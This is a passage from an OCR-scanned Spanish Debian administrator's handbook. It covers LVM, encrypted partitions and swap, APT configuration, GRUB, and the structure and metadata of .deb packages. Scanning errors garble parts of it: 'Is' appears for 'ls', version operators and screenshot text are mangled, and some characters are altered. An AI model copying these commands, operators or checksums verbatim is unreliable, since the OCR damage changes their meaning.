creacion  de  un  nuevo  volumen  fisico  y  sus  nuevos  bloques  pueden  ser  asociados  a  cualquier 
grupo  de  volumenes.  Todas  las  particiones  del  grupo  de  volumenes  expandido  tendran  espacio 
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adicional  sobre  el  que  extenderse. 

La  herramienta  de  particionado  configura  LVM  en  varios  pasos.  Primero  debe  crear  las  parti- 
ciones  en  los  discos  existentes  que  seran  «volumenes  fi'sicos  para  LVM».  Para  activar  LVM  debe 
seleccionar  «Configurar  el  gestor  de  volumenes  logicos  (LVM)»  y  luego,  en  la  misma  pantalla  de 
configuracion,  «Crear  grupo  de  volumenes»  al  que  le  asociara  los  volumenes  fi'sicos  existentes. 
Finalmente  podra  crear  volumenes  logicos  dentro  de  este  grupo  de  volumenes.  La  herramienta 
de  particionado  automatico  puede  realizar  todos  estos  pasos  automaticamente. 

Cada  volumen  fisico  aparecera  en  el  menu  de  particionado  como  un  disco  con  solo  una  particion 
que  no  puede  ser  eliminada  pero  que  puede  utilizar  como  desee. 

Se  describe  el  uso  de  LVM  con  mas  detalles  en  la  Seccion  12.1.2,  «LVM»  pagina  333. 


Configuracion  de  particiones  cifradas 

Para  garantizar  la  confidencialidad  de  sus  datos,  por  ejemplo  en  el  caso  de  perdida  o  robo  de 
su  equipo  o  un  disco  duro,  es  posible  cifrar  los  datos  en  algunas  particiones.  Se  puede  agregar 
esta  funcionalidad  bajo  cualquier  sistema  de  archivos  ya  que,  como  con  LVM;  Linux  (en  particu¬ 
lar  el  controlador  dm-crypt)  utiliza  el  mapeador  de  dispositivos  («Device  Mapper»)  para  crear 
una  particion  virtual  (cuyo  contenido  es  protegido)  basandose  en  una  particion  subyacente  que 
almacenara  los  datos  en  forma  cifrada  (gracias  a  LUKS,  «configuracion  unificada  de  claves  en 
Linux»  por  sus  siglas  en  ingles,  un  formato  estandar  que  permite  almacenar  tanto  datos  encrip- 
tados  como  tambien  metainformacion  que  indica  los  algoritmos  de  cifrado  utilizados). 


SEGURIDAD  Cuando  se  utiliza  una  particion  cifrada,  se  almacena  la  clave  de  cifrado  en  memo- 
Particion  swap  cifrada  r'a  (PAM).  Obtener  esta  clave  permite  descfirar  los  datos,  por  lo  que  es  de  mayor 
importancia  evitar  dejar  una  copia  de  esta  clave  que  pueda  ser  accedida  por  el  po- 
tencial  ladron  del  equipo  o  disco  duro  o  a  un  tecnico  de  mantenimiento.  Esto  puede 
ocurrir  facilmente  en  un  equipo  portatil  ya  que  al  hibernar  se  almacenan  los  con- 
tenidos  de  la  RAM  en  la  particion  SWAP.  Si  esta  particion  no  se  encuentra  cifrada, 
el  ladron  podra  acceder  a  la  clave  y  utilizarla  para  descifrar  los  datos  de  las  parti¬ 
ciones  cifradas.  Por  esta  razon,  cuando  utilice  particiones  cifradas  ;es  imperativo 
tambien  cifrar  la  particion  swap! 

El  instalador  de  Debian  advertira  al  usuario  si  intenta  crear  una  particion  cifrada 
cuando  la  particion  swap  no  sea  cifrada  tambien. 


Para  crear  una  particion  cifrada  primero  debe  asignar  una  particion  disponible  para  este  propo- 
sito.  Lo  lograra  seleccionando  una  particion  e  indicando  que  sea  utilizada  como  «volumen  fisico 
para  cifrado».  Luego  de  particionar  el  disco  que  contenga  el  volumen  fisico,  seleccione  «Con- 
figurar  volumenes  cifrados».  El  software  le  propondra  inicializar  el  volumen  fisico  con  datos 
aleatorios  (dificultando  aun  mas  la  localizacion  de  los  datos  reales)  y  le  pedira  que  ingrese  una 
«frase  de  cifrado»  que  tendra  que  ingresar  cada  vez  que  arranque  el  equipo  para  poder  acceder 
al  contenido  de  la  particion  cifrada.  Una  vez  que  complete  este  paso  y  haya  vuelto  al  menu  de  la 
herramienta  de  particionado,  tendra  disponible  una  nueva  particion  en  un  «volumen  cifrado» 
que  puede  configurar  como  cualquier  otra  particion.  En  la  mayoria  de  los  casos,  utilizara  esta 
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particion  como  un  volumen  fisico  de  LVM  para  proteger  varias  particiones  (volumenes  logicos 
LVM)  con  la  misma  clave  de  cifrado,  incluyendo  la  particion  swap  (revise  el  recuadro  «Particion 
swap  cifrada»  pagina  68). 


4.2.14.  Instalacion  del  sistema  base 

Este  paso,  que  no  necesita  interaccion  con  el  usuario,  instala  los  paquetes  del  «sistema  base» 
Debian.  Esto  incluye  las  herramientas  dp  kg  y  apt  que  administran  los  paquetes  Debian,  asi  como 
tambien  los  programas  necesarios  para  iniciar  el  sistema  y  comenzar  a  utlizarlo. 


:  ;,0  debian8 


Instalar  el  sistema  base 


Extrayendo  zliblg.. , 


Instalando  el  sistema  base 


Figura  4. 11  Instalacion  del  sistema  base 


4.2.15.  Configuracion  del  gestor  de  paquetes  (apt) 

Para  poder  instalar  software  adicional,  necesita  configurar  APT  para  indicarle  donde  encontrar 
paquetes  Debian.  Este  paso  es  tan  automatico  como  es  posible.  Comienza  preguntando  si  debe 
utilizar  una  fuente  de  paquetes  en  la  red  o  si  solo  debe  buscar  paquetes  en  el  CD-ROM. 


NOTA  Si  el  instalador  detecta  un  disco  de  instalacion  de  Debian  en  el  lector  de  CD/DVD, 

CD-ROM  de  Debian  en  el  no  es  necesar'°  configurar  APT  para  que  busque  paquetes  en  la  red:  APT  es  configu- 

dispositivo  rado  automaticamente  para  leer  paquetes  de  un  dispositivo  removible.  Si  el  disco 
es  parte  de  un  conjunto  el  software  ofrecera  la  opcion  de  «explorar»  otros  discos 
para  tener  referencias  a  todos  los  paquetes  en  ellos. 


Si  se  desea  obtener  paquetes  de  la  red,  las  siguientes  dos  preguntas  le  permitiran  elegir  un  ser- 
vidor  del  que  descargar  los  paquetes  seleccionando  primero  un  pais  y  depues  una  replica  dispo- 
nible  en  dicho  pais  (una  replica  es  un  servidor  publico  que  alberga  copias  de  todos  los  archivos 
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del  archivo  principal  de  Debian). 


-  C  debian8 


Configurar  el  gestor  de  paquetes 

Por  favor,  seleccione  una  replica  de  Debian.  Deberia  escoger  una  replica  en  su  pals  o  region  si  no  sabe 
que  replica  tiene  mejor  conexion  de  Internet  hasta  usted. 

Normalmente,  ftp.ccodigo  de  su  pais>. debian.org  es  una  buena  eleccion. 

Replica  de  Debian: 


Capturar  la  pantalia  |  Retroceder  <^ontinuar 


Figura  4.12  Selection  de  una  replica  de  Debian 


Finalmente,  el  programa  propone  utilizar  un  proxy  HTTP.  Si  no  configura  un  proxy,  accedera 
a  internet  directamente.  Si  ingresa  http://proxy.falcot.com:3128,  APT  utilizara  el  proxy/cache  de 
Falco,  un  programa  «Squid».  Puede  encontrar  estas  configuraciones  revisando  la  configuracion 
de  un  navegador  web  en  otro  equipo  conectado  a  la  misma  red. 

Los  archivos  Packages  .gz  y  Sources  .gz  son  descargados  automaticamente  para  actualizar  la 
lista  de  paquetes  reconocidos  por  APT. 


VOLVER  A  LOS  CIMIENTOS  Un  proxy  HTTP  es  un  servidor  que  redirige  un  pedido  HTTP  para  usuarios  de  red.  A 
Proxy  HTTP  veces  ayuda  a  acelerar  las  descargas  manteniendo  una  copia  de  los  archivos  trans- 
feridos  a  traves  de  el  (hablamos  entonces  de  un  «proxy/cache»).  En  algunos  casos 
es  el  unico  modo  de  acceder  un  servicio  web  externo;  en  dichos  casos  es  esencial 
responder  la  pregunta  correspondiente  durante  la  instalacion  para  que  el  programa 
pueda  descargar  los  paquetes  Debian  a  traves  de  el. 

Squid  es  el  nombre  del  software  de  servidor  utilizado  por  Falcot  Corp  que  ofrece 
este  servicio. 


4.2.16.  Concurso  de  popularidad  de  paquetes  Debian 

El  sistema  Debian  contiene  un  paquete  llamado  popularity-contest  cuyo  proposito  es  compilar  es- 
tadisticas  del  uso  de  paquetes.  Cada  semana,  este  paquete  recopila  informacion  de  los  paquetes 
instalados  y  aquellos  utilizados  recientemente  y  envfa  esta  informacion  de  forma  anonima  a  los 
servidores  del  proyecto  Debian.  El  proyecto  luego  puede  utilizar  esta  informacion  para  determi- 
nar  la  importancia  relativa  de  cada  paquete,  lo  que  influencia  la  prioridad  que  se  le  dara  a  cada 
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uno.  En  particular,  los  paquetes  mas  «populares»  seran  incluidos  en  el  CD-ROM  de  instalacion 
facilitando  el  acceso  a  los  mismos  a  aquellos  usuarios  que  no  deseen  descargarlos  o  adquirir  un 
conjunto  completo. 

Este  paquete  solo  se  activa  a  pedido  por  respeto  a  la  confidencialidad  de  los  datos  de  uso  de  los 
usuarios. 


4.2.17.  Seleccion  de  paquetes  para  instalacion 

El  proximo  paso  le  permite  elegir  el  proposito  del  equipo  en  terminos  muy  generales;  las  diez 
tareas  sugeridas  corresponden  a  listas  de  paquetes  a  instalar.  La  lista  de  paquetes  que  sera  insta- 
lada  realmente  sera  adaptada  y  completada  mas  adelante,  pero  provee  un  buen  punto  de  partida 
de  forma  simple. 

Algunos  paquetes  tambien  son  instalados  automaticamente  segun  el  hardware  detectado  (gra- 
cias  al  programa  discover-pkginstall  del  paquete  discover).  Por  ejemplo,  si  se  detecta  una 
maquina  virtual  VirtualBox  el  programa  instalara  el  paquete  virtualbox-guest-dkms  que  permite 
una  mejor  integracion  de  la  maquina  virtual  con  el  sistema  anfitrion. 


15  7} 
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Seleccion  de  programas 

De  momento  solo  esta  instalado  el  sistema  basico.  Puede  escoger  la  instalacion  de  las  siguientes 
colecciones  predefinidas  de  programas  para  adaptar  mas  la  instalacion  a  sus  necesidades. 

Elegir  los  programas  a  instalar: 


Capturar  la  pantalla  Retroceder  Continuar 


Figura4.13  Election  de  tareas 


4.2.18.  Instalacion  del  gestor  de  arranque  GRUB 

El  gestor  de  arranque  es  el  primer  progama  iniciado  por  el  BIOS.  Este  programa  carga  el  nucleo 
Linux  a  la  memoria  y  luego  lo  ejecuta.  Generalmente  ofrece  un  menu  que  le  permite  al  usuario 
seleccionar  el  nucleo  y/ o  sistema  operativo  a  iniciar. 
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CUIDADO  Estafase  en  el  proceso  de  instalacion  de  Debian  detecta  los  sistemas  operativos  que 
El  gestor  de  arranque  e  Ya  se  encuer|tran  instalados  en  el  equipo  y  agrega  los  elementos  correspondientes 
inicio  dual  menli  de  arranque,  pero  no  todos  los  programas  de  instalacion  lo  hacen. 

En  particular,  si  luego  instala  (o  reinstala)  Windows  borrara  el  gestor  de  arranque. 
Debian  seguira  en  el  disco  duro  pero  no  podra  accederlo  desde  el  menu  de  arranque. 
Necesitara  inicar  el  sistema  de  instalacion  de  Debian  en  modo  «rescate»  (rescue) 
para  configurar  un  gestor  de  arranque  menos  exclusivo.  El  manual  de  instalacion 
describe  en  detalle  esta  operacion. 

>*•  http :  //www.  debian .  org/ releases/ stable/amd64/ch08s07 .  html 


De  forma  predeterminada,  el  menu  propuesto  por  GRUB  contiene  todos  los  nucleos  Linux  ins¬ 
talados  asf  como  tambien  todos  los  demas  sistemas  operativos  detectados.  Es  por  esta  razon 
que  deberfa  aceptar  la  oferta  de  instalarlo  en  el  registro  de  arranque  maestro  («Master  Boot  Re- 
cord»).  Generalmente  tiene  sentido  mantener  algunas  versiones  anteriores  del  nucleo  ya  que 
hacerlo  mantiene  su  capacidad  de  iniciar  el  mismo  sistema  cuando  el  ultimo  nucleo  instalado  es 
defectuoso  o  no  se  adapta  correctamente  al  hardware. 

GRUB  es  el  gestor  de  arranque  instalado  por  Debian  de  forma  predeterminada  gracias  a  su  supe- 
rioridad  tecnica:  funciona  con  la  mayoria  de  los  sistemas  de  archivo  y  no  necesita  actualizarlo 
luego  de  cada  instalacion  de  un  nuevo  nucleo  ya  que  lee  su  configuracion  durante  el  inicio  y 
encuentra  la  position  exacta  del  nuevo  nucleo.  La  version  1  de  GRUB  (ahora  conocida  como 
«Grub  Legacy»)  no  era  compatible  con  todas  las  combinaciones  de  LVM  y  RAID  por  software;  la 
version  2,  instalada  de  forma  predeterminada,  es  mas  completa.  Aun  pueden  existir  situaciones 
donde  es  mas  recomendable  instalar  LILO  (otro  gestor  de  arranque);  el  instalador  lo  sugerira 
automaticamente. 

Para  mas  information  sobre  la  configuracion  de  GRUB,  revise  la  Section  8.8.3,  « Configuracion 
de  GRUB  2»  pagina  175. 


CUIDADO 

Gestores  de  arranque  y 
arquitecturas 


LILO  y  GRUB,  mencionados  en  este  capitulo,  son  los  gestores  de  arranque  para  las 
arquitecturas  i386  y  amd64.  Si  instala  Debian  en  otra  arquitectura  necesitara  utili- 
zar  otro  gestor  de  arranque.  Entre  ellos  podemos  citar  yaboot  o  quik  para  powerpc, 
silo  para  spare,  aboot  para  alpha,  a  reboot  para  mips. 


4.2.19.  Finalization  de  la  instalacion  y  reiniciado 

La  instalacion  ahora  esta  completa,  el  programa  le  invita  a  quitar  el  CD-ROM  y  reiniciar  el  equipo. 

4.3.  Luego  del  primer  arranque 

Si  activo  la  tarea  «Entorno  Debian  de  escritorio»  sin  ninguna  election  explicita  (o  con  la  election 
de  ’’GNOME”),  el  equipo  mostrara  el  gestor  de  inicio  de  sesion  gdm3. 


72 


El  manual  del  Administrador  de  Debian 


Figura4.14  Primer  arranque 


El  usuario  que  fue  creado  puede  iniciar  sesion  y  comenzar  a  trabajar  inmediatamente. 


4.3.1  Instalacion  de  software  adicional 

Los  paquetes  instalados  corresponden  a  los  perfiles  seleccionados  durante  la  instalacion  pero 
no  necesariamente  para  el  uso  que  se  le  dara  realmente  al  equipo.  Por  lo  tanto,  podrfa  desear 
utilizar  una  herramienta  de  gestion  de  paquetes  para  refinar  la  seleccion  de  paquetes  instala¬ 
dos.  Las  dos  herramientas  utilizadas  mas  frecuentemente  (que  son  instaladas  si  se  eligio  el  per- 
fil  «Entorno  Debian  de  escritorio»)  son  apt  (disponible  desde  la  linea  de  ordenes)  y  synaptic 
(«Administrador  de  paquetes  Synaptic»  en  el  menu). 

Para  facilitar  la  instalacion  de  grupos  de  programas  coherentes,  Debian  crea  «tareas»  dedicadas 
a  usos  especificos  (servidor  de  correo,  servidor  de  archivos,  etc.).  Tuvo  oportunidad  de  seleccio- 
narlos  durante  la  instalacion  y  puede  accederlos  nuevamente  gracias  a  herramientas  de  gestion 
de  paquetes  como  aptitude  (las  tareas  se  encuentran  en  una  seccion  particular)  y  synaptic  (a 
traves  del  menu  Editar  — >•  Marcar  paquetes  por  tarea...). 

Aptitude  es  una  interfaz  para  APT  de  pantalla  completa  en  modo  texto.  Permite  al  usuario  na- 
vegar  la  lista  de  paquetes  disponibles  segun  varias  categories  (paquetes  instalados  o  no  instala¬ 
dos,  por  tarea,  por  seccion,  etc.)  y  revisar  toda  la  informacion  disponible  para  cada  uno  de  ellos 
(dependencias,  conflictos,  descripcion,  etc.).  Cada  paquete  puede  ser  marcado  «install»  (para 
instalar,  la  tecla  +)  o  «remove»  (para  eliminar,  la  tecla  -),  Se  realizaran  todas  estas  operaciones 
simultaneamente  una  vez  que  las  confirme  presionando  la  tecla  g  (por  «go!»,  «jadelante!»).  Si 
se  olvido  algunos  programas  no  se  preocupe;  podra  ejecutar  aptitude  nuevamente  una  vez  que 
se  completo  la  instalacion  inicial. 
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SUGERENCIA 

Muchas  tareas  estan  dedicadas  a  la  localizacion  del  sistema  a  otros  idiomas  ademas 

Debian  piensa  en  quienes 
no  hablan  ingles 

del  ingles.  Incluyen  documentacion  traducida,  diccionarios  y  varios  otros  paquetes 
utiles  a  quienes  hablen  distintos  idiomas.  Se  selecciona  la  tarea  apropiada  automa¬ 
ticamente  si  selecciono  un  idioma  distinto  al  ingles  durante  la  instalacion. 

CULTURA 

Antes  de  aptitude,  el  programa  estandar  para  seleccionar  paquetes  a  instalar  era 

dselect,  la  antigua 
interfaz  para  instalar 
paquetes 

dselect,  la  antigua  interfaz  grafica  asociada  con  dpkg.  Ya  que  se  trata  de  un  pro¬ 
grama  difi'cil  de  utilizar  para  principiantes,  no  es  recomendado. 

Por  supuesto,  se  puede  no  seleccionar  tarea  alguna  para  instalar.  En  este  caso,  puede  instalar 
manualmente  el  software  deseado  con  apt-get  o  aptitude  (ambos  disponibles  en  la  linea  de 
ordenes). 

VOCABULARIO 

En  la  jerga  de  empaquetado  de  Debian,  una  «dependencia»  es  otro  paquete  ne- 

Dependencias  de  un 
paquete,  conflictos 

cesario  para  que  el  paquete  en  cuestion  funcione  correctamente.  A  la  inversa,  un 
«conflicto»  es  un  paquete  que  no  puede  ser  instalado  junto  con  otro. 

Se  discuten  estos  conceptos  con  mas  detalles  en  el  Capftulo  5:  «Sistema  de  paque¬ 
tes:  herramientas  y  principios  fundamentales»  pagina  78. 

4.3.2.  Actualization  del  sistema 

Al  principio,  generalmente  se  necesitaba  aptitude  safe- upgrade  (una  orden  utilizada  para 
actualizar  automaticamente  los  programas  instalados),  especialmente  debido  a  posibles  actuali- 
zaciones  de  seguridad  publicadas  desde  la  entrega  de  la  ultima  version  estable  de  Debian.  Estas 
actualizaciones  podrian  requerir  preguntas  adicionales  a  traves  de  debconf,  la  herramienta  es- 
tandar  para  configuration  en  Debian.  Para  mas  information  sobre  estas  actualizaciones  realiza- 
das  por  aptitude  revise  la  Seccion  6.2.3,  «Actualizacion  del  sistema»  pagina  116. 
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Como  un  administrador  de  un  sistema  Debian  generalmente  manejara  paquetes  .  deb  ya  que  contienen 
unidades  funcionales  consistentes  (aplicaciones,  documentation,  etc.)  facilitando  su  instalaciony 
mantenimiento.  Por  lo  tanto,  es  buena  idea  saber  que  son  y  como  utilizarlos. 


Este  capitulo  describe  la  estructura  y  los  contenidos  de  paquetes  «binarios»  y  «fuente».  Los  pri- 
meros  son  archivos  .deb  para  utilizar  directamente  con  dpkg  mientras  que  los  ultimos  contie- 
nen  el  codigo  fuente  asf  como  las  instrucciones  para  crear  los  paquetes  binarios. 


5.1.  Estructura  de  un  paquete  binario 

El  formato  del  paquete  Debian  fue  disenado  para  que  su  contenido  pueda  ser  extrafdo  en  cual- 
quier  sistema  Unix  que  tenga  los  programas  clasicos  a  r,  ta  r  y  gzip  (a  veces  xz  o  bzip2).  Esta 
propiedad  aparentemente  trivial  es  importante  para  portabilidad  y  recuperacion  en  caso  de 
desastres. 

Imagine  por  ejemplo  que  elimino  por  error  el  programa  dpkg  y  que,  por  lo  tanto,  ya  no  puede 
instalar  paquetes  Debian.  Siendo  dpkg  un  paquete  en  si  mismo  pareciera  como  que  su  sistema 
estuviese  condenado...  afortunadamente  conoce  el  formato  de  un  paquete  y  puede  descargar 
el  archivo  .deb  para  el  paquete  dpkg  e  instalarlo  manualmente  (revise  el  recuadro  «dpkg,  APT 
y  ar»  pagina  78).  Si  por  cualquier  motivo  o  problema  uno  o  mas  de  los  programas  ar,  tar  o 
gzip/xz/bzip2  desaparecieron  solo  necesitara  copiar  el  programa  faltante  de  otro  sistema  (ya 
que  cada  uno  de  ellos  funciona  de  forma  completamente  autonoma  una  simple  copia  bastara).  Si 
su  sistema  sufre  algun  evento  de  peor  fortuna  e  incluso  esto  no  funciona  (^quizas  a  su  sistema  le 
falten  bibliotecas  a  mas  bajo  nivel?),  deberia  intentar  la  version  estatica  del  programa  busybox 
(incluido  en  el  paquete  busybox-static),  el  cual  es  inclusive  mas  autocontenido  y  proporciona 
ordenes  como  busybox  ar,  busybox  tary  busybox  gunzip. 


HERRAMIENTAS  dpkg  es  el  programa  que  maneja  los  archivos  .  deb,  en  particular  los  extrae,  analiza 
dpkg,  APT  y  ar  V  descomprime. 

APT  es  un  grupo  de  programas  que  permite  la  ejecucion  de  modificaciones  de  mas 
alto  nivel  al  sistema:  instalar  o  eliminar  un  paquete  (mientras  mantiene  dependen¬ 
ces  satisfechas),  actualizar  el  sistema,  listar  los  paquetes  disponibles,  etc. 

En  cuanto  al  programa  ar,  permite  manejar  los  archivos  del  mismo  nombre: 
art  compendio  muestra  la  lista  de  archivos  contenidos  en  el  compendio,  ar  x 
compendio  extrae  dichos  archivos  al  directorio  actual,  a r  d  compendio  archivo 
elimina  un  archivo  del  compendio,  etc.  Su  pagina  de  manual  (a r ( 1 ) )  documenta 
todas  sus  funcionalidades.  ar  es  una  herramienta  muy  rudimentaria  que  un  ad- 
ministrador  Unix  solo  uti I izari'a  en  raras  ocasiones,  pero  utilizarian  rutinariamente 
tar,  un  programa  de  manejo  de  archivos  y  compendios  mas  evolucionado.  Es  por 
eso  que  es  sencillo  restaurar  dpkg  en  el  caso  de  que  sea  eliminado  por  error.  Solo  ne- 
cesita  descargar  el  paquete  Debian  y  extraer  el  contenido  del  archivo  data  .  tar .  gz 
en  la  raiz  del  sistema  (/): 

#  ar  x  dpkg_1.17.23_amd64.deb 

#  tar  -C  /  -p  -xzf  data. tar. gz 
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VOLVER  A  LOS  CIMIENTOS  Los  principiantes  pueden  encontrar  confusas  las  referencias  como  « a r  ( 1 )  »  en  la 
Notacion  de  paginas  de  Uteratura.  Generalmente  esta  es  una  forma  conveniente  de  referirse  a  la  pagina  de 
manual  manual  titulada  ar  en  la  seccion  1. 

Algunas  veces  se  utiliza  esta  notacion  para  eliminar  ambiguedades,  por  ejemplo 
para  distinguir  entre  el  programa  printf,  que  tambien  puede  indicarse  como  pri 
ntf  (1),  y  la  funcion  printf  del  lenguaje  de  programacion  C,  que  tambien  puede 
indicarse  como  printf  (3). 

El  Capitulo  7:  «Resolucion  de  problemas  y  busqueda  de  informacion  relevante» 
pagina  142  discute  las  paginas  de  manual  con  mas  detalles  (revise  la  Seccion  7.1.1, 
«Paginas  de  manual*  pagina  142). 


Estos  son  los  contenidos  de  un  archivo  .  deb: 

$  ar  t  dpkg_1.17.23_amd64.deb 

debian-binary 
control. tar. gz 
data. tar. gz 

$  ar  x  dpkg_1.17.23_amd64.deb 
$  Is 

control. tar. gz  data. tar. gz  debian-binary  dpkg  1.17. 23_amd64. deb 

$  tar  tzf  data. tar. gz  |  head  -n  15 

./ 

./var/ 

. /var/lib/ 

. /var/lib/dpkg/ 

. /var/lib/dpkg/parts/ 

,/var/lib/dpkg/info/ 

,/var/lib/dpkg/alternatives/ 

. /var/lib/dpkg/updates/ 

./etc/ 

./etc/logrotate.d/ 

. /etc/log  rot at e.d/dpkg 
./etc/dpkg/ 

. /etc/dpkg/dpkg . cfg . d/ 

. /etc/dpkg/dpkg . cfg 
. /etc/alternatives/ 

$  tar  tzf  control . tar . gz 

./ 

. /conf files 
. /postinst 
. /md5sums 
./prerm 
. /preinst 
./control 
./postrm 

$  cat  debian-binary 

2.0 
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Como  puede  ver,  el  compendio  a  r  de  un  paquete  Debian  contiene  tres  archivos: 

■  debian -binary.  Es  un  archivo  de  texto  que  indica  simplemente  la  version  del  archivo 
.  deb  utilizado  (en  2015:  version  2.0). 

■  control .  ta r . gz.  Este  compendio  contiene  toda  la  metainformacion  disponible,  como  el 
nombre  y  la  version  del  paquete.  Alguna  de  esta  metainformacion  le  permite  a  las  he- 
rramientas  de  gestion  de  paquetes  determinar  si  es  posible  instalar  o  desinstalarlo,  por 
ejemplo  segun  la  lista  de  paquetes  que  ya  se  encuentran  en  el  equipo. 

■  data.  tar. gz.  Este  compendio  contiene  todos  los  archivos  a  extraerse  del  paquete;  aqui 
es  donde  estan  almacenados  los  archivos  ejecutables,  la  documentation  etc.  Algunos  pa¬ 
quetes  pueden  utilizar  otros  formatos  de  compresion,  en  los  que  el  archivo  tendra  otro 
nombre  (data  .  tar .  bz2  para bzip2m  data  .  tar . xz  para  XZ). 


5.2.  Metainformacion  de  un  paquete 

Un  paquete  Debian  no  es  solo  un  compendio  de  archivos  a  instalar.  Es  parte  de  un  todo  mas 
grande  y  describe  su  relacion  con  otros  paquetes  Debian  (dependences,  conflictos,  sugerencias). 
Tambien  provee  scripts  que  permiten  la  ejecucion  de  ordenes  en  diferentes  etapas  del  ciclo  de 
vida  del  paquete  (instalacion,  elimination,  actualization).  Estos  datos  utilizados  por  las  herra- 
mientas  de  gestion  de  paquetes  no  son  parte  del  software  empaquetado,  son  lo  que  se  denomina 
«metainformacion»  (information  sobre  otra  informacion)  dentro  del  paquete. 


5.2.1  Descripcion:  el  archivo  control 

Este  archivo  utiliza  una  estructura  similar  a  las  cabeceras  de  email  (definidas  en  RFC  2822).  Por 
ejemplo  el  archivo  cont  rol  de  apt  se  ve  de  la  siguiente  forma: 

$  apt-cache  show  apt 

Package:  apt 
Version:  1.0. 9. 6 
Installed-Size:  3788 

Maintainer:  APT  Development  Team  <deity@lists . debian . org> 

Architecture:  amd64 

Replaces:  manpages-it  («  2.80-4-),  manpages-pl  («  20060617-3-) ,  openjdk-6- jdk  («  6 
b24-l.  ll-0ubuntul~) ,  sun- java5- jdk  (»  0),  sun- java6- jdk  (»  0) 

Depends:  libapt-pkg4. 12  (>=  1.0. 9. 6),  libc6  (>=  2.15),  libgccl  (>=  1:4. 1.1),  libstdc 
++6  (>=  4.9),  debian-archive-keyring,  gnupg 
Suggests:  aptitude  |  synaptic  |  wajig,  dpkg-dev  (>=  1.17.2),  apt-doc,  python-apt 
Conflicts:  python-apt  («  0.7.93.2-) 

Breaks:  manpages-it  («  2.80-4-),  manpages-pl  («  20060617-3-) ,  open j dk-6- j dk  («  6 
b24-l.  ll-0ubuntul~) ,  sun- java5- jdk  (»  0),  sun- java6- jdk  (»  0) 

Description-en :  commandline  package  manager 
This  package  provides  commandline  tools  for  searching  and 
managing  as  well  as  guerying  information  about  packages 
as  a  low-level  access  to  all  features  of  the  libapt-pkg  library. 
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These  include: 

*  apt-get  for  retrieval  of  packages  and  information  about  them 
from  authenticated  sources  and  for  installation,  upgrade  and 
removal  of  packages  together  with  their  dependencies 

*  apt-cache  for  guerying  available  information  about  installed 
as  well  as  installable  packages 

*  apt-cdrom  to  use  removable  media  as  a  source  for  packages 

*  apt-config  as  an  interface  to  the  configuration  settings 

*  apt-key  as  an  interface  to  manage  authentication  keys 
Description-md5 :  9f b97a88cb7383934ef963352b53b4a7 

Tag:  admin :: package-management ,  devel : : lang : ruby ,  hardware: : storage, 
hardware: :storage:cd,  implemented-in : :c++,  implemented-in : :perl, 
implemented-in : : ruby ,  interface: : commandline,  network: : client, 
protocol :: ftp,  protocol :: http,  protocol :: ipv6,  role :: program, 
role :: shared-lib,  scope :: application ,  scope: :utility,  sound :: player, 
suite :: debian ,  use :: downloading ,  use: organizing,  use :: searching , 
works-with: :audio,  works-with: :software:package,  works-with: :text 
Section:  admin 
Priority:  important 

Filename :  pool/main/a/apt/apt  1 .0.9. 6_amd64 . deb 
Size:  1107560 

MD5sum :  a325ccbl4e69fef2c50da54e035a4df4 
SHA1 :  635d09f Cb600ecl2810e3136d51e696bcfa636a6 

SHA256 :  371a559ce741394b59dbc6460470a9399be5245356a9183bbeea0f89ecaabb03 


VOLVER  A  LOS  CIMIENTOS  RFC  son  las  siglas  de  «pedido  de  comentarios»  («Request  For  Comments*).  Un 
_  estandares  de  RFC  es  generalmente  un  documento  tecnico  que  describe  lo  que  se  convertira  en 

internet  un  estandar  de  internet.  Antes  de  convertirse  en  estandar  y  congelarse,  estos  es¬ 

tandares  son  enviados  para  revision  publica  (de  ahi  su  nombre).  La  IETF  («lnternet 
Engineering  Task  Force*:  grupo  de  trabajo  de  ingenieria  de  internet)  decide  sobre 
la  evolucion  del  estado  de  estos  documentos  (estandares  propuestos,  borradores  de 
estandar  o  estandar). 

RFC  2026  define  el  proceso  de  estadarizacion  de  protocolos  de  internet, 
http : //www. faqs.org/rfcs/rfc2026. html 


Dependencias:  el  campo  Depends 

Las  dependencias  estan  definidas  en  el  campo  Depends  en  la  cabecera  del  paquete.  Esta  es  una 
lista  de  condiciones  a  cumplir  para  que  el  paquete  funcione  correctamente  —  las  herramientas 
como  apt  utilizan  esta  informacion  para  instalar  las  bibliotecas  necesarias,  las  versiones  apro- 
piadas,  para  satisfacer  las  dependencias  del  paquete  a  instalar.  Para  cada  dependencia  es  posible 
restringir  el  rango  de  versiones  que  cumplen  dicha  condicion.  En  otras  palabras,  es  posible  ex- 
presar  el  hecho  de  que  necesitamos  el  paquete  libc6  en  una  version  igual  o  mayor  a  «2.15»  (escrito 
como«libc6  (>=2.15)». 
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Los  operadores  de  comparacion  de  versiones  son  los  siguientes: 

■  «:  menor  que; 

■  <=:  menor  o  igual  que; 

■  =:  igual  a  (note  que  «2.6.1»  no  es  igual  a  «2.6.1-1»); 

■  >=:  mayor  o  igual  que; 

■  »:  mayor  que. 

En  una  lista  de  condiciones  a  cumplir,  la  coma  sirve  como  separador.  Debe  interpretarsela  co- 
mo  un  «y»  logico.  En  las  condiciones  una  barra  vertical  («|»)  expresa  un  «o»  logico  (es  un  «o» 
inclusivo,  no  uno  exclusivo  que  significa  «o  uno  o  el  otro»).  Tiene  mas  prioridad  que  «y»  y  pue- 
de  ser  utilizado  tantas  veces  como  sea  necesario.  Por  lo  tanto,  la  dependencia  «(A  o  B)  y  C»  se 
escribe  A  |  B,  C.  Por  otro  lado,  la  expresion  «A  o  (B  y  C)»  debe  escribirse  «(A  o  B)  y  (A  o  C)»ya 
que  el  campo  Depends  no  permite  parentesis  que  cambien  el  orden  de  las  prioridades  entre  los 
operadores  logicos  «o»  e  «y».  Por  lo  tanto,  se  lo  escribiria  A  |  B ,  A  |  C. 

http : //www. debian . org/doc/debian- policy/ch- relationships . html 

El  sistema  de  dependencias  es  un  buen  mecanismo  para  garantizar  el  funcionamiento  de  un  pro- 
grama,  pero  tiene  otro  uso  con  los  «metapaquetes».  Estos  son  paquetes  vacios  que  solo  describen 
dependencias.  Facilitan  la  instalacion  de  un  grupo  consistente  de  programas  preseleccionados 
por  el  desarrollador  del  metapaquete;  como  tal  apt  install  metapaquete  instalara  automa- 
ticamente  todos  estos  programas  utilizando  las  dependencias  del  metapaquete.  Los  paquetes 
gnome,  kde-full  y  linux-image-amd64,  por  ejemplo,  son  metapaquetes. 


NORMA  DEBIAN  Los  campos  Recommends  y  Suggests  describen  dependencias  que  no  son  obliga- 
Campos  Recommends  torias.  Las  dependencias  «recomendadas»,  las  mas  importantes,  mejoran  conside- 
